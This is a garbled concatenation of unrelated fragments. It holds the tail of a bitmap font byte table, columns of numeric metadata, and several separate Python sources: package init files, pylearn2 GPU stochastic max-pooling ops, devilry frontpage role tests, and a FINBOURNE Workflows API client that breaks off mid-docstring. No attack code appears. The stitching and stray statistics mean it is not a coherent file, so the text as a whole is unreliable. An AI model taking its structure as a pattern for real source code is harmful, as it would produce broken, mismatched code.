0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x41,0x00,0x41,0x00,0x21,0x00,0x22,0x00,0x12,0x00,0x14,0x00,0x0c,0x00,0x0c,0x00,0x08,0x00,0x08,0x00,0x10,0x00,0xe0,0x00, # Character 0x59 (89)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x80,0x01,0x80,0x03,0x00,0x06,0x00,0x0c,0x00,0x18,0x00,0x30,0x00,0x60,0x00,0x7f,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x5a (90)
0x07,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x30,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x07,0x00, # Character 0x5b (91)
0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x5c (92)
0x70,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x06,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x70,0x00, # Character 0x5d (93)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x80,0x4c,0x80,0x47,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x5e (94)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x5f (95)
]
| 173.598039
| 185
| 0.77636
| 3,367
| 17,707
| 4.082863
| 0.06831
| 0.55343
| 0.683495
| 0.772823
| 0.840038
| 0.787881
| 0.772678
| 0.731796
| 0.655343
| 0.612134
| 0
| 0.552816
| 0.033377
| 17,707
| 101
| 186
| 175.316832
| 0.250351
| 0.10781
| 0
| 0.02
| 0
| 0
| 0
| 0
| 0
| 1
| 0.782625
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
d88bad9a0eeab66cf4c34590d60f0c4f53dd5b75
| 207
|
py
|
Python
|
pinnacle/endpoints/__init__.py
|
miikama/pinnacle
|
ecf9a839f526ca78c54199c7c2bdb630e2b28ebc
|
[
"MIT"
] | 54
|
2017-07-12T22:52:19.000Z
|
2022-01-16T11:04:02.000Z
|
pinnacle/endpoints/__init__.py
|
miikama/pinnacle
|
ecf9a839f526ca78c54199c7c2bdb630e2b28ebc
|
[
"MIT"
] | 16
|
2017-08-22T15:50:47.000Z
|
2022-03-08T14:41:19.000Z
|
pinnacle/endpoints/__init__.py
|
miikama/pinnacle
|
ecf9a839f526ca78c54199c7c2bdb630e2b28ebc
|
[
"MIT"
] | 32
|
2017-07-21T17:14:36.000Z
|
2022-02-21T18:19:43.000Z
|
from pinnacle.endpoints.account import Account
from pinnacle.endpoints.betting import Betting
from pinnacle.endpoints.marketdata import MarketData
from pinnacle.endpoints.referencedata import ReferenceData
| 34.5
| 58
| 0.879227
| 24
| 207
| 7.583333
| 0.333333
| 0.263736
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082126
| 207
| 5
| 59
| 41.4
| 0.957895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d8a749e4184075545c76ca3d61faf61ab690f683
| 122
|
py
|
Python
|
mafia_resources/db/__init__.py
|
whiteRa2bit/backend_app
|
c91cfe4791f5f0ec4d1f2dbb7ac8fa73a09b067e
|
[
"Unlicense",
"MIT"
] | null | null | null |
mafia_resources/db/__init__.py
|
whiteRa2bit/backend_app
|
c91cfe4791f5f0ec4d1f2dbb7ac8fa73a09b067e
|
[
"Unlicense",
"MIT"
] | null | null | null |
mafia_resources/db/__init__.py
|
whiteRa2bit/backend_app
|
c91cfe4791f5f0ec4d1f2dbb7ac8fa73a09b067e
|
[
"Unlicense",
"MIT"
] | null | null | null |
from mafia_resources.db.utils import get_mongo_db, to_object_id
from mafia_resources.db.collection import MongoCollection
| 40.666667
| 63
| 0.885246
| 19
| 122
| 5.368421
| 0.684211
| 0.176471
| 0.352941
| 0.392157
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07377
| 122
| 2
| 64
| 61
| 0.902655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
99942ce8453070e86377e474436a61c95f5029c8
| 19,249
|
py
|
Python
|
pylearn2/sandbox/cuda_convnet/stochastic_pool.py
|
ikervazquezlopez/Pylearn2
|
2971e8f64374ffde572d4cf967aad5342beaf5e0
|
[
"BSD-3-Clause"
] | 2,045
|
2015-01-01T14:07:52.000Z
|
2022-03-08T08:56:41.000Z
|
pylearn2/sandbox/cuda_convnet/stochastic_pool.py
|
ikervazquezlopez/Pylearn2
|
2971e8f64374ffde572d4cf967aad5342beaf5e0
|
[
"BSD-3-Clause"
] | 305
|
2015-01-02T13:18:24.000Z
|
2021-08-20T18:03:28.000Z
|
pylearn2/sandbox/cuda_convnet/stochastic_pool.py
|
ikervazquezlopez/Pylearn2
|
2971e8f64374ffde572d4cf967aad5342beaf5e0
|
[
"BSD-3-Clause"
] | 976
|
2015-01-01T17:08:51.000Z
|
2022-03-25T19:53:17.000Z
|
"""
GPU op for Stochastic max pooling as defined in:
Stochastic Pooling for Regularization of Deep Convolutional Neural Networks
Matthew D. Zeiler, Rob Fergus, ICLR 2013
The code is written around Alex Krizhevsky's cuda-convnet
"""
__authors__ = "Mehdi Mirza"
__copyright__ = "Copyright 2010-2013, Universite de Montreal"
__credits__ = ["Mehdi Mirza", "David Warde-Farley"]
__license__ = "3-clause BSD"
__maintainer__ = "Mehdi Mirza"
__email__ = "mirzamom@iro"
import warnings
import numpy
from theano import shared
from theano.gof import Apply
from theano.sandbox.cuda import CudaNdarrayType
from theano.sandbox.cuda.basic_ops import as_cuda_ndarray_variable
from theano.sandbox.cuda.basic_ops import gpu_contiguous
from theano.sandbox.cuda import GpuOp
from theano.tensor import get_scalar_constant_value, NotScalarConstantError, zeros_like
from pylearn2.sandbox.cuda_convnet.base_acts import UnimplementedError
from pylearn2.sandbox.cuda_convnet.convnet_compile import convnet_available
from pylearn2.sandbox.cuda_convnet.convnet_compile import cuda_convnet_loc
from pylearn2.sandbox.cuda_convnet.shared_code import this_dir
from pylearn2.sandbox.cuda_convnet.pool import MaxPoolGrad
def stochastic_max_pool_c01b(c01b, pool_shape, pool_stride, start=0, seed = 1234):
"""
.. todo::
WRITEME
"""
assert pool_shape[0] == pool_shape[1]
assert pool_stride[0] == pool_stride[1]
op = StochasticMaxPool(pool_shape[0], pool_stride[0], start, seed)
c01b = gpu_contiguous(c01b)
return op(c01b)
def weighted_max_pool_c01b(c01b, pool_shape, pool_stride, start=0):
"""
.. todo::
WRITEME
"""
assert pool_shape[0] == pool_shape[1]
assert pool_stride[0] == pool_stride[1]
op = WeightedMaxPool(pool_shape[0], pool_stride[0], start)
c01b = gpu_contiguous(c01b)
return op(c01b)
class StochasticMaxPool(GpuOp):
"""
Stochastic MaxPool op code on the GPU.
The input are in the order (channel, image rows, image cols, batch)
Works only on square images and the grad works only when
channel % 16 == 0.
Parameters
----------
ds : int
defines the size of the pooling region in the x (equivalently, y)
dimension. Squares of size (ds)2 get reduced to one value by this
layer. There are no restrictions on the value of this parameter. It's
fine for a pooling square to fall off the boundary of the image. Named
SizeX in Alex's code.
stride : int
defines the stride size between successive pooling squares. Setting
this parameter smaller than sizeX produces overlapping pools. Setting
it equal to sizeX gives the usual, non-overlapping pools. Values
greater than sizeX are not allowed.
start : int, optional
tells the net where in the input image to start the pooling (in x,y
coordinates). In principle, you can start anywhere you want. Setting
this to a positive number will cause the net to discard some pixels at
the top and at the left of the image. Setting this to a negative number
will cause it to include pixels that don't exist (which is fine).
start=0 is the usual setting.
outputs : int, optional
allows you to control how many output values in the x (equivalently, y)
dimension this operation will produce. This parameter is analogous to
the start parameter, in that it allows you to discard some portion of
the image by setting it to a value small enough to leave part of the
image uncovered. Setting it to zero instructs the net to produce as
many outputs as is necessary to ensure that the whole image is covered.
default 0
seed : WRITEME
"""
def __init__(self, ds, stride, start=0, outputs=0, seed = 1234):
self.ds = ds
self.stride = stride
self.start = start
self.copy_non_contiguous = 0
self.seed_state = shared(numpy.asarray(seed).astype('float32'))
self.seed_state.default_update = self.seed_state + 1
assert stride > 0 and stride <= ds, (stride, ds)
assert ds > 0, ds # We check in the code if ds <= imgSizeX
def __eq__(self, other):
"""
.. todo::
WRITEME
"""
#Dont put copy_non_contigous as this doesn't change the output
return (type(self) == type(other) and
self.ds == other.ds and
self.stride == other.stride and
self.start == other.start)
def __hash__(self):
"""
.. todo::
WRITEME
"""
#Dont put copy_non_contigous as this doesn't change the output
return (hash(type(self)) ^ hash(self.ds) ^
hash(self.stride) ^ hash(self.start))
def c_header_dirs(self):
"""
.. todo::
WRITEME
"""
return [this_dir]
def c_headers(self):
"""
.. todo::
WRITEME
"""
return ['nvmatrix.cuh', 'conv_util.cuh']
def c_lib_dirs(self):
"""
.. todo::
WRITEME
"""
return [cuda_convnet_loc]
def c_libraries(self):
"""
.. todo::
WRITEME
"""
return ['cuda_convnet']
def c_code_cache_version(self):
"""
.. todo::
WRITEME
"""
return (1,)
def _argument_contiguity_check(self, arg_name):
"""
.. todo::
WRITEME
"""
return """
if (!CudaNdarray_is_c_contiguous(%%(%(arg_name)s)s))
{
if (!(%(class_name_caps)s_COPY_NON_CONTIGUOUS)) {
PyErr_SetString(PyExc_ValueError,
"%(class)s: %(arg_name)s must be C contiguous");
%%(fail)s;
}
}
""" % {
'class': self.__class__.__name__,
'arg_name': arg_name,
'class_name_caps': self.__class__.__name__.upper(),
}
def make_node(self, images):
"""
.. todo::
WRITEME
"""
images = as_cuda_ndarray_variable(images)
assert images.ndim == 4
channels_broadcastable = images.type.broadcastable[0]
batch_broadcastable = images.type.broadcastable[3]
rows_broadcastable = False
cols_broadcastable = False
targets_broadcastable = (channels_broadcastable, rows_broadcastable,
cols_broadcastable, batch_broadcastable)
targets_type = CudaNdarrayType(broadcastable=targets_broadcastable)
targets = targets_type()
seed = self.seed_state
seed = as_cuda_ndarray_variable(seed)
return Apply(self, [images, seed], [targets])
def c_code(self, node, name, inputs, outputs, sub):
"""
.. todo::
WRITEME
"""
images, seed = inputs
targets, = outputs
fail = sub['fail']
# The amount of braces that must be closed at the end
num_braces = 0
if self.copy_non_contiguous:
raise UnimplementedError()
else:
basic_setup = "#define STOCHASTICMAXPOOL_COPY_NON_CONTIGUOUS 0\n"
# Convert images in nv_images, an NVMatrix, for compatibility
# with the cuda-convnet functions
setup_nv_images = self._argument_contiguity_check("images") + """
if (%(images)s->nd != 4)
{
PyErr_Format(PyExc_ValueError,
"images must have nd=4, got nd=%%i", %(images)s->nd);
%(fail)s;
}
{ //setup_nv_images brace 1
const int * images_dims = CudaNdarray_HOST_DIMS(%(images)s);
const int img_channels = images_dims[0];
const int imgSizeY = images_dims[1];
const int imgSizeX = images_dims[2];
const int batch_size = images_dims[3];
if(imgSizeY != imgSizeX){
PyErr_Format(PyExc_ValueError,
"images must be square(dims[1] == dims[2]). Shape (%%i,%%i,%%i,%%i)",
img_channels, imgSizeY, imgSizeX, batch_size);
%(fail)s;
}
if(%(ds)s > imgSizeY){
PyErr_Format(PyExc_ValueError,
"ds(%%d) must be <= imgSizeX(%%d) and imgSizeY(%%d).",
%(ds)s, imgSizeX, imgSizeY);
%(fail)s;
}
if(%(start)s >= imgSizeX){
PyErr_Format(PyExc_ValueError,
"start is %%d but must be smaller then the images size of %%d x %%d.",
%(start)s, imgSizeX, imgSizeY);
%(fail)s;
}
NVMatrix nv_images(%(images)s, img_channels * imgSizeY * imgSizeX, batch_size,
"MaxPool:nv_images");
//int * seed = CudaNdarray_HOST_DIMS%(seed)s;
float * seed = CudaNdarray_DEV_DATA(%(seed)s);
//int * seed = %(seed)s;
"""
num_braces += 1
setup_nv_targets = """
//int _outputsX = int(ceil((dic['imgSize'] - dic['start'] - dic['sizeX']) / float(dic['stride']))) + 1;
int _outputsX = ((int)(ceil((imgSizeY - %(start)s - %(ds)s) / ((float)%(stride)s)))) + 1;
int target_dims [] = {
img_channels,
_outputsX,
_outputsX,
batch_size };
if (CudaNdarray_prep_output(& %(targets)s, 4, target_dims))
{
%(fail)s;
}
{ // setup_nv_target brace # 1
NVMatrix nv_targets(%(targets)s, target_dims[0] * target_dims[1] * target_dims[2],
target_dims[3], "MaxPool:nv_targets");
"""
num_braces += 1
do_pool = """
convLocalStochasticMaxPool(nv_images, nv_targets, img_channels, %(ds)s,
%(start)s, %(stride)s, _outputsX, MaxPooler(), seed);
"""
braces = '}' * num_braces
rval = (basic_setup +
setup_nv_images +
setup_nv_targets +
do_pool +
braces)
start = self.start
stride = self.stride
ds = self.ds
rval = rval % locals()
return rval
def grad(self, inp, grads):
"""
.. todo::
WRITEME
"""
x, seed = inp
gz, = grads
gz = gpu_contiguous(gz)
maxout = self(x)
return [MaxPoolGrad(self.ds, self.stride, self.start)(x, maxout, gz), zeros_like(seed)]
# Make sure the cuda_convnet library is compiled and up-to-date
def make_thunk(self, *args, **kwargs):
"""
.. todo::
WRITEME
"""
if not convnet_available():
raise RuntimeError('Could not compile cuda_convnet')
return super(StochasticMaxPool, self).make_thunk(*args, **kwargs)
class WeightedMaxPool(GpuOp):
"""
This op wrap Alex's MaxPool code on the GPU.
The input are in the order (channel, image rows, image cols, batch)
Works only on square images and the grad works only when
channel % 16 == 0.
Parameters
----------
ds : int
defines the size of the pooling region in the x (equivalently, y)
dimension. Squares of size (ds)2 get reduced to one value by this
layer. There are no restrictions on the value of this parameter. It's
fine for a pooling square to fall off the boundary of the image. Named
SizeX in Alex's code.
stride : int
defines the stride size between successive pooling squares. Setting
this parameter smaller than sizeX produces overlapping pools. Setting
it equal to sizeX gives the usual, non-overlapping pools. Values
greater than sizeX are not allowed.
start : int, optional
tells the net where in the input image to start the pooling (in x,y
coordinates). In principle, you can start anywhere you want. Setting
this to a positive number will cause the net to discard some pixels at
the top and at the left of the image. Setting this to a negative number
will cause it to include pixels that don't exist (which is fine).
start=0 is the usual setting.
outputs : int, optional
allows you to control how many output values in the x (equivalently, y)
dimension this operation will produce. This parameter is analogous to
the start parameter, in that it allows you to discard some portion of
the image by setting it to a value small enough to leave part of the
image uncovered. Setting it to zero instructs the net to produce as
many outputs as is necessary to ensure that the whole image is covered.
default 0
"""
def __init__(self, ds, stride, start=0, outputs=0):
self.ds = ds
self.stride = stride
self.start = start
self.copy_non_contiguous = 0
assert stride > 0 and stride <= ds, (stride, ds)
assert ds > 0, ds # We check in the code if ds <= imgSizeX
def __eq__(self, other):
"""
.. todo::
WRITEME
"""
#Dont put copy_non_contigous as this doesn't change the output
return (type(self) == type(other) and
self.ds == other.ds and
self.stride == other.stride and
self.start == other.start)
def __hash__(self):
"""
.. todo::
WRITEME
"""
#Dont put copy_non_contigous as this doesn't change the output
return (hash(type(self)) ^ hash(self.ds) ^
hash(self.stride) ^ hash(self.start))
def c_header_dirs(self):
"""
.. todo::
WRITEME
"""
return [this_dir]
def c_headers(self):
"""
.. todo::
WRITEME
"""
return ['nvmatrix.cuh', 'conv_util.cuh']
def c_lib_dirs(self):
"""
.. todo::
WRITEME
"""
return [cuda_convnet_loc]
def c_libraries(self):
"""
.. todo::
WRITEME
"""
return ['cuda_convnet']
def c_code_cache_version(self):
"""
.. todo::
WRITEME
"""
return (1,)
def _argument_contiguity_check(self, arg_name):
"""
.. todo::
WRITEME
"""
return """
if (!CudaNdarray_is_c_contiguous(%%(%(arg_name)s)s))
{
if (!(%(class_name_caps)s_COPY_NON_CONTIGUOUS)) {
PyErr_SetString(PyExc_ValueError,
"%(class)s: %(arg_name)s must be C contiguous");
%%(fail)s;
}
}
""" % {
'class': self.__class__.__name__,
'arg_name': arg_name,
'class_name_caps': self.__class__.__name__.upper(),
}
def make_node(self, images):
"""
.. todo::
WRITEME
"""
images = as_cuda_ndarray_variable(images)
assert images.ndim == 4
channels_broadcastable = images.type.broadcastable[0]
batch_broadcastable = images.type.broadcastable[3]
rows_broadcastable = False
cols_broadcastable = False
targets_broadcastable = (channels_broadcastable, rows_broadcastable,
cols_broadcastable, batch_broadcastable)
targets_type = CudaNdarrayType(broadcastable=targets_broadcastable)
targets = targets_type()
return Apply(self, [images], [targets])
def c_code(self, node, name, inputs, outputs, sub):
"""
.. todo::
WRITEME
"""
images, = inputs
targets, = outputs
fail = sub['fail']
# The amount of braces that must be closed at the end
num_braces = 0
if self.copy_non_contiguous:
raise UnimplementedError()
else:
basic_setup = "#define WEIGHTEDMAXPOOL_COPY_NON_CONTIGUOUS 0\n"
# Convert images in nv_images, an NVMatrix, for compatibility
# with the cuda-convnet functions
setup_nv_images = self._argument_contiguity_check("images") + """
if (%(images)s->nd != 4)
{
PyErr_Format(PyExc_ValueError,
"images must have nd=4, got nd=%%i", %(images)s->nd);
%(fail)s;
}
{ //setup_nv_images brace 1
const int * images_dims = CudaNdarray_HOST_DIMS(%(images)s);
const int img_channels = images_dims[0];
const int imgSizeY = images_dims[1];
const int imgSizeX = images_dims[2];
const int batch_size = images_dims[3];
if(imgSizeY != imgSizeX){
PyErr_Format(PyExc_ValueError,
"images must be square(dims[1] == dims[2]). Shape (%%i,%%i,%%i,%%i)",
img_channels, imgSizeY, imgSizeX, batch_size);
%(fail)s;
}
if(%(ds)s > imgSizeY){
PyErr_Format(PyExc_ValueError,
"ds(%%d) must be <= imgSizeX(%%d) and imgSizeY(%%d).",
%(ds)s, imgSizeX, imgSizeY);
%(fail)s;
}
if(%(start)s >= imgSizeX){
PyErr_Format(PyExc_ValueError,
"start is %%d but must be smaller then the images size of %%d x %%d.",
%(start)s, imgSizeX, imgSizeY);
%(fail)s;
}
NVMatrix nv_images(%(images)s, img_channels * imgSizeY * imgSizeX, batch_size,
"MaxPool:nv_images");
"""
num_braces += 1
setup_nv_targets = """
//int _outputsX = int(ceil((dic['imgSize'] - dic['start'] - dic['sizeX']) / float(dic['stride']))) + 1;
int _outputsX = ((int)(ceil((imgSizeY - %(start)s - %(ds)s) / ((float)%(stride)s)))) + 1;
int target_dims [] = {
img_channels,
_outputsX,
_outputsX,
batch_size };
if (CudaNdarray_prep_output(& %(targets)s, 4, target_dims))
{
%(fail)s;
}
{ // setup_nv_target brace # 1
NVMatrix nv_targets(%(targets)s, target_dims[0] * target_dims[1] * target_dims[2],
target_dims[3], "MaxPool:nv_targets");
"""
num_braces += 1
do_pool = """
convLocalWeightedPool(nv_images, nv_targets, img_channels, %(ds)s,
%(start)s, %(stride)s, _outputsX, MaxPooler());
"""
braces = '}' * num_braces
rval = (basic_setup +
setup_nv_images +
setup_nv_targets +
do_pool +
braces)
start = self.start
stride = self.stride
ds = self.ds
rval = rval % locals()
return rval
def grad(self, inp, grads):
"""
.. todo::
WRITEME
"""
raise NotImplementedError()
# Make sure the cuda_convnet library is compiled and up-to-date
def make_thunk(self, node, storage_map, compute_map, no_recycling):
"""
.. todo::
WRITEME
"""
if not convnet_available():
raise RuntimeError('Could not compile cuda_convnet')
return super(WeightedMaxPool, self).make_thunk(
node, storage_map, compute_map, no_recycling)
| 31.147249
| 111
| 0.574679
| 2,288
| 19,249
| 4.653409
| 0.147727
| 0.026862
| 0.016906
| 0.019724
| 0.871231
| 0.857706
| 0.857706
| 0.833474
| 0.824082
| 0.817883
| 0
| 0.010367
| 0.323497
| 19,249
| 617
| 112
| 31.197731
| 0.807249
| 0.259182
| 0
| 0.751592
| 0
| 0.025478
| 0.418065
| 0.088501
| 0
| 0
| 0
| 0.042139
| 0.031847
| 1
| 0.089172
| false
| 0
| 0.044586
| 0
| 0.219745
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
41f3ace55a0d3832bc5f1012b643cb346ed41067
| 5,917
|
py
|
Python
|
devilry/devilry_frontpage/tests/test_frontpage.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | null | null | null |
devilry/devilry_frontpage/tests/test_frontpage.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | null | null | null |
devilry/devilry_frontpage/tests/test_frontpage.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | null | null | null |
from django.conf import settings
from django.test import TestCase
from django_cradmin import cradmin_testhelpers
from model_mommy import mommy
from devilry.devilry_account.models import PermissionGroup
from devilry.devilry_frontpage.views import frontpage
class TestFrontpage(TestCase, cradmin_testhelpers.TestCaseMixin):
viewclass = frontpage.FrontpageView
def test_title(self):
testuser = mommy.make(settings.AUTH_USER_MODEL)
mockresponse = self.mock_http200_getrequest_htmls(requestuser=testuser)
self.assertEqual('Devilry frontpage',
mockresponse.selector.one('title').alltext_normalized)
def test_h1(self):
testuser = mommy.make(settings.AUTH_USER_MODEL)
mockresponse = self.mock_http200_getrequest_htmls(requestuser=testuser)
self.assertEqual('Choose your role',
mockresponse.selector.one('h1').alltext_normalized)
def test_user_is_student(self):
testuser = mommy.make(settings.AUTH_USER_MODEL)
mommy.make('core.Candidate',
relatedstudent__user=testuser,
assignment_group__parentnode=mommy.make_recipe('devilry.apps.core.assignment_activeperiod_start'))
mockresponse = self.mock_http200_getrequest_htmls(requestuser=testuser)
self.assertTrue(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-student'))
self.assertFalse(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-examiner'))
self.assertFalse(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-anyadmin'))
def test_user_is_examiner(self):
testuser = mommy.make(settings.AUTH_USER_MODEL)
mommy.make('core.Examiner',
relatedexaminer__user=testuser,
assignmentgroup__parentnode=mommy.make_recipe('devilry.apps.core.assignment_activeperiod_start'))
mockresponse = self.mock_http200_getrequest_htmls(requestuser=testuser)
self.assertFalse(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-student'))
self.assertTrue(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-examiner'))
self.assertFalse(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-anyadmin'))
def test_user_is_superuser(self):
testuser = mommy.make(settings.AUTH_USER_MODEL, is_superuser=True)
mockresponse = self.mock_http200_getrequest_htmls(requestuser=testuser)
self.assertFalse(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-student'))
self.assertFalse(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-examiner'))
self.assertTrue(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-anyadmin'))
self.assertTrue(mockresponse.selector.exists('.devilry-frontpage-superuser-link'))
def test_user_is_departmentadmin(self):
testuser = mommy.make(settings.AUTH_USER_MODEL)
mommy.make('devilry_account.PermissionGroupUser', user=testuser,
permissiongroup=mommy.make(
'devilry_account.SubjectPermissionGroup',
permissiongroup__grouptype=PermissionGroup.GROUPTYPE_DEPARTMENTADMIN).permissiongroup)
mockresponse = self.mock_http200_getrequest_htmls(requestuser=testuser)
self.assertFalse(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-student'))
self.assertFalse(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-examiner'))
self.assertTrue(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-anyadmin'))
self.assertFalse(mockresponse.selector.exists('.devilry-frontpage-superuser-link'))
def test_user_is_subjectadmin(self):
testuser = mommy.make(settings.AUTH_USER_MODEL)
mommy.make('devilry_account.PermissionGroupUser', user=testuser,
permissiongroup=mommy.make(
'devilry_account.SubjectPermissionGroup',
permissiongroup__grouptype=PermissionGroup.GROUPTYPE_SUBJECTADMIN).permissiongroup)
mockresponse = self.mock_http200_getrequest_htmls(requestuser=testuser)
self.assertFalse(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-student'))
self.assertFalse(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-examiner'))
self.assertTrue(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-anyadmin'))
self.assertFalse(mockresponse.selector.exists('.devilry-frontpage-superuser-link'))
def test_user_is_periodadmin(self):
testuser = mommy.make(settings.AUTH_USER_MODEL)
mommy.make('devilry_account.PermissionGroupUser', user=testuser,
permissiongroup=mommy.make('devilry_account.PeriodPermissionGroup').permissiongroup)
mockresponse = self.mock_http200_getrequest_htmls(requestuser=testuser)
self.assertFalse(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-student'))
self.assertFalse(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-examiner'))
self.assertTrue(
mockresponse.selector.exists('.devilry-frontpage-listbuilder-roleselect-itemvalue-anyadmin'))
self.assertFalse(mockresponse.selector.exists('.devilry-frontpage-superuser-link'))
| 56.894231
| 117
| 0.726382
| 555
| 5,917
| 7.571171
| 0.136937
| 0.091385
| 0.136126
| 0.172775
| 0.836982
| 0.836982
| 0.836982
| 0.834603
| 0.824607
| 0.824607
| 0
| 0.005352
| 0.178976
| 5,917
| 103
| 118
| 57.446602
| 0.859613
| 0
| 0
| 0.663043
| 0
| 0
| 0.267872
| 0.256549
| 0
| 0
| 0
| 0
| 0.26087
| 1
| 0.086957
| false
| 0
| 0.065217
| 0
| 0.173913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5ace779b2c34a6202932b08a7bb5859064e9665c
| 49,696
|
py
|
Python
|
sdk/lusid_workflows/api/workflows_api.py
|
finbourne/workflows-sdk-generated-preview
|
41201c402e8d006740d278339cb80283000e4ce6
|
[
"MIT"
] | null | null | null |
sdk/lusid_workflows/api/workflows_api.py
|
finbourne/workflows-sdk-generated-preview
|
41201c402e8d006740d278339cb80283000e4ce6
|
[
"MIT"
] | null | null | null |
sdk/lusid_workflows/api/workflows_api.py
|
finbourne/workflows-sdk-generated-preview
|
41201c402e8d006740d278339cb80283000e4ce6
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
FINBOURNE Workflows API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.1.25
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from lusid_workflows.api_client import ApiClient
from lusid_workflows.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class WorkflowsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def execute_workflow(self, workflow_code, execute_workflow_request, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Execute workflow # noqa: E501
This will create a new workflow instance for the specified workflow # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.execute_workflow(workflow_code, execute_workflow_request, async_req=True)
>>> result = thread.get()
:param workflow_code: Workflow Code (required)
:type workflow_code: str
:param execute_workflow_request: Data associated with execute request (required)
:type execute_workflow_request: ExecuteWorkflowRequest
:param correlation_id: Optional. This id can be used to correlate a workflow instance with any entity (e.g. a custom entity or other workflow instance) and also to retrieve and transit workflow instances
:type correlation_id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
